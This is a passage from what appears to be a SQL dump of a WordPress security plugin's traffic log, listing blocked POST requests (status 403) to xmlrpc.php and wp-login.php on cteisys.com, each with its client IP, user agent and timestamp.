Firefox\\/96\"}','uNbiK2CMDV3hX6FALEgOYcZl',0,1665641033.1193,18517,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','viHQcfEabRPJ3sSo2BktwdDg',0,1665645764.6071,1757,'','POST',403,0,515,0,1,'',0),('148.72.214.59',2487801403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2WDePwBgxy5aU3uF0jZnozbC',0,1665645623.9912,20910,'','POST',403,0,515,0,1,'',0),('162.240.211.236',2733691884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9PlBOn5DL7RmKNXqMI6YgUsA',0,1665645299.0413,1294,'','POST',403,0,515,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wQrbV2kaFKR0Z9jmXMGydHhO',0,1665645222.1593,18920,'','POST',403,0,515,0,1,'',0),('8.210.174.93',148024925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7VLC6a91wx5ctvrmRjKSGFXJ',0,1665644835.7337,1905,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xlsS6AzqDaWZ75IByGPcpkQY',0,1665644752.9083,2808,'','POST',403,0,515,0,1,'',0),('51.91.220.143',861658255,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','rfBqjW8G2UJHITpRnZo1AhEs',0,1665644597.7095,916,'','POST',403,0,600,0,1,'',0),('141.98.102.179',2372036275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LxKbSJ5jeQoTDcH2IsUWPuXl',0,1665644567.3762,18488,'','POST',403,0,515,0,1,'',0),('141.98.102.179',2372036275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pSDLEKbCRe1i0x27YyMvwOq4',0,1665644460.7894,1571,'','POST',403,0,515,0,1,'',0),('162.241.174.216',2733747928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Wmox73DFru2IthTiCK6f9lHX',0,1665644411.6446,16998,'','POST',403,0,515,0,1,'',0),('192.64.117.208',3225449936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','nxwf3lLBP4M8X6qW7UyDdNet',0,1665650454.1018,976,'','POST',403,0,515,0,1,'',0),('31.220.106.105',534538857,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','jJxSnvrbhazZfDy7A8Nop5sK',0,1665650453.6281,1173,'','POST',403,0,515,0,1,'',0),('89.46.105.239',1496213999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','qg27rsm90vHUZMkwf1JQiTXb',0,1665650446.4807,2715,'','POST',403,0,515,0,1,'',0),('156.67.73.144',2621655440,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','K0uU1qXGHSQEdwPyCRp9s2kn',0,1665650447.3838,1650,'','POST',403,0,515,0,1,'',0),('185.30.32.94',3105759326,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ReSdg190bvtCFa2DQrW5PuKy',0,1665650446.8898,1939,'','POST',403,0,515,0,1,'',0),('195.179.237.9',3283348745,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','m8i5A3hNJYcjTF9PlGVbdXp0',0,1665650444.0552,493,'','POST',403,0,515,0,1,'',0),('198.211.115.226',3335746530,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yCBoFsVda2r6WmTLMhg5ZJbX',0,1665650353.9718,2549,'','POST',403,0,515,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','ynt17eJQ48wYO3xI9bpFGWUT',0,1665650050.0143,1662,'','POST',403,0,600,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pWa3GFN6KLgqUZYsVjR74iPo',0,1665649986.3100,1443,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jIHn6fak4iRbCYNQd3O859rc',0,1665649867.6310,8964,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pRsj6ZCuf9xTJ0ONkBoQ4AYg',0,1665649372.1813,18662,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','3GlSJep1cahUsfTADvXzYILH',0,1665648985.6581,1380,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aB0g7FEGYlf16HKXxLozwuWq',0,1665648873.1854,4721,'','POST',403,0,515,0,1,'',0),('34.79.206.104',575655528,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AYQFIRfZp75VGcS91zOeNWHv',0,1665648520.8169,1647,'','POST',403,0,515,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','QFD5pJYRETHPlKahzSMU348C',0,1665648674.0787,1432,'','POST',403,0,600,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HfN9G2kD18A5CsjonqWS0ahP',0,1665648395.5583,2496,'','POST',403,0,515,0,1,'',0),('82.102.27.195',1382423491,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KVAEi92v4FM01N5duDJQGgLY',0,1665648017.1945,2135,'','POST',403,0,515,0,1,'',0),('8.142.173.121',143568249,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','DHbYpAfZyWRCwjoV4tsIz9mF',0,1665654177.1200,1393,'','POST',403,0,600,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','b0GzlSxRkinYB1prfjVMd4DT',0,1665654008.2100,1732,'','POST',403,0,515,0,1,'',0),('128.127.105.184',2155833784,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','exFXREYjTGbJPNO1kr6w9z4f',0,1665654052.4090,1398,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Rhmb5cnEyNCTDPLvg4Zi0GFW',0,1665653895.9035,19466,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8mViwzXyjGD5kEWR0Kn932u7',0,1665653362.8175,1579,'','POST',403,0,515,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aGp8X1VrEmnR4yvdSw0DjbqT',0,1665652911.3319,2563,'','POST',403,0,515,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','dYLuWZB7S6mTX4lUg30sMr9i',0,1665652786.7139,1659,'','POST',403,0,600,0,1,'',0),('207.244.248.44',3488938028,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c47ORiNYHjCVG2MeZD6UtA3n',0,1665651957.7408,1519,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','onFvQ0HRd9PBX2D18IiApjNu',0,1665652340.5295,18297,'','POST',403,0,515,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','o5bcAyeS1GfsB3H06W9RDtqK',0,1665651828.5167,1586,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','t0pEnQjDuTvLPfkZNGszbho8',0,1665651728.4983,503,'','POST',403,0,515,0,1,'',0),('62.171.183.101',1051440997,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','qR8dhzW2aIOe5wHiSCG10fLx',0,1665651726.8157,535,'','POST',403,0,515,0,1,'',0),('50.73.33.135',843653511,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','DUEujz9nMOoLZXr84IvfhSTB',0,1665651714.5960,518,'','POST',403,0,515,0,1,'',0),('31.184.215.230',532207590,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Psbx7AHETFZh6qLl0S4cQgDR',0,1665651713.0557,515,'','POST',403,0,515,0,1,'',0),('125.212.229.33',2111104289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','vjnkSXGAfaVibrQ49oTMILHm',0,1665651708.0401,1245,'','POST',403,0,515,0,1,'',0),('52.179.81.192',884167104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','SyfhD9sLiKblFm1J4ak6dP3W',0,1665651700.9971,481,'','POST',403,0,515,0,1,'',0),('198.38.88.250',3324401914,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','n3yaLTpdZeGIK8okstAH9rBz',0,1665651684.4106,1895,'','POST',403,0,515,0,1,'',0),('31.184.215.230',532207590,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','82qXvbt5WuUALldQ9CBiegh1',0,1665656290.8876,522,'','POST',403,0,515,0,1,'',0),('164.92.169.121',2757536121,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','HlRkM7wUBXzjYscEDFm5WnJq',0,1665656280.8493,1410,'','POST',403,0,515,0,1,'',0),('72.52.186.8',1211415048,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Vt0ZXbD6qfNnKrH32p5yhsel',0,1665656278.4456,552,'','POST',403,0,515,0,1,'',0),('66.228.32.9',1122246665,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','ygtNoBpVIFZwOnLUk0CxDvsA',0,1665656268.7057,2031,'','POST',403,0,515,0,1,'',0),('185.50.56.4',3107076100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','WnzyaJ4KAYNXOhS80GdkgV9w',0,1665656268.9291,1358,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ARmiaPB6oVzysS3rHhgO5Uc1',0,1665656260.3295,1769,'','POST',403,0,515,0,1,'',0),('148.72.232.160',2487806112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','4JUiK2WkzxXjn7HaPy8t0N9e',0,1665656258.6141,1012,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','1pmPdiVtJqoXrnejSYylsHwc',0,1665656234.8693,17336,'','POST',403,0,515,0,1,'',0),('72.52.186.8',1211415048,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','yHPRtvqDBsemzNnc4Q3kpfJw',0,1665656238.2944,13821,'','POST',403,0,515,0,1,'',0),('164.92.169.121',2757536121,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','OcPT0fosJwpN8gKtiCAIr2LD',0,1665656236.8451,15251,'','POST',403,0,515,0,1,'',0),('162.240.216.162',2733693090,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8XuHCywAUWqzSBYk6hObGlVd',0,1665656120.3302,18562,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NxzDnmjSP6MB3lZYWiXFIa5A',0,1665655963.0927,21317,'','POST',403,0,515,0,1,'',0),('95.111.225.89',1601167705,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aQdSnkpl3gvG9FJDwTuiA2o1',0,1665655576.6285,1283,'','POST',403,0,515,0,1,'',0),('143.244.140.199',2415168711,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','qg4x3YTNp6kahmWL2tvKURzE',0,1665655576.2043,2349,'','POST',403,0,600,0,1,'',0),('103.145.51.200',1737569224,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6ArWnPqUxRKQYMEG5dusHvmo',0,1665659659.6683,18205,'','POST',403,0,515,0,1,'',0),('51.79.146.95',860852831,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','UHeLEVGaS0QrJu53qt18BmvW',0,1665659716.3728,1799,'','POST',403,0,515,0,1,'',0),('67.205.176.79',1137553487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','q8xFDf7BXrkpL054nmvbjJdc',0,1665659201.3312,532,'','POST',403,0,515,0,1,'',0),('31.184.215.230',532207590,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','76Ldm3vb8g0IJXR2efcrDQyV',0,1665659194.3835,657,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','I1sANOi63XGT5WpCbUMwSK0L',0,1665659193.2324,601,'','POST',403,0,515,0,1,'',0),('34.145.125.175',579960239,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','Favi1RrEuQTy5dIC68WG3LV0',0,1665659184.5654,536,'','POST',403,0,515,0,1,'',0),('194.63.235.189',3258969021,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','cCKeJUw4n27jumTi5L8dQIsV',0,1665659182.3879,502,'','POST',403,0,515,0,1,'',0),('208.77.159.5',3494747909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','gQjhBWTxurqLCsRe7yYp8k0E',0,1665659151.0727,18141,'','POST',403,0,515,0,1,'',0),('91.134.248.245',1535572213,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','y3REtFOdxeSU6isf5W0mNnaZ',0,1665659164.6304,4578,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZPCiKVSnmkvGscMbeOY6zDjW',0,1665658818.8020,18939,'','POST',403,0,515,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ETw8drx0Si4ah56PpobegtZ1',0,1665664955.6360,1465,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','3WNgSLQHRDqwhoz652tMfV9x',0,1665665091.8569,1302,'','POST',403,0,515,0,1,'',0),('103.98.152.12',1734514700,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eipo04kaFwuI1mAVDLGW6On5',0,1665664811.4343,18535,'','POST',403,0,515,0,1,'',0),('51.15.160.148',856662164,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','df0Y4lxoNVrpBuhw1A6c5Oay',0,1665664353.0214,1582,'','POST',403,0,515,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','VBrTNE7MIxmWCbL4h2cJpSUi',0,1665664226.7126,20655,'','POST',403,0,515,0,1,'',0),('86.105.9.67',1449724227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZWRVO5TwA6N0YmGxjbXMcQpv',0,1665663655.7719,1788,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TIfRaLYD5n1A3CB7XE2dFUuJ',0,1665663623.3213,18990,'','POST',403,0,515,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vba9isWQZAlP8gyVzHBGXUcu',0,1665663155.9051,2830,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','5PcpgSqU6IDCzQyo2vOY3XiJ',0,1665662873.0300,484,'','POST',403,0,600,0,1,'',0),('178.128.5.109',2994734445,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','DUgQPxXGqWejOlNu1pym7I9d',0,1665662600.2780,1274,'','POST',403,0,600,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ynhZOE4lDKs2XjvH8xJ1fe0u',0,1665662558.5132,537,'','POST',403,0,515,0,1,'',0),('185.107.112.128',3110826112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','8qIcsMPN3bHXrW0kx1AhtlGa',0,1665662507.5185,1250,'','POST',403,0,515,0,1,'',0),('208.77.159.5',3494747909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','jnLaeKuZgXJGd3qohyMzC7S2',0,1665662475.2060,726,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','JVfOyF8lm7rItzbguGe0AUsN',0,1665662493.2962,664,'','POST',403,0,515,0,1,'',0),('23.226.89.72',400709960,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','D13QPHOEsr2d4IyTMgYhAtui',0,1665662460.5168,672,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','niqoYWZPUsalSmCOMvdD2ut9',0,1665662468.9882,558,'','POST',403,0,515,0,1,'',0),('70.34.133.151',1176667543,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','c9fhAiPnN8kJVtmREl6Da302',0,1665662455.1833,788,'','POST',403,0,515,0,1,'',0),('35.202.169.54',600484150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','4BFTAwRyub3VWCHarn5o1kD8',0,1665662451.5259,1589,'','POST',403,0,515,0,1,'',0),('161.97.90.217',2707512025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','NCzSsWnuJr5tA80ZohmP2yx4',0,1665662440.3417,561,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fyeS72EcCudkOD1xhHUoPXtZ',0,1665667848.8317,18983,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 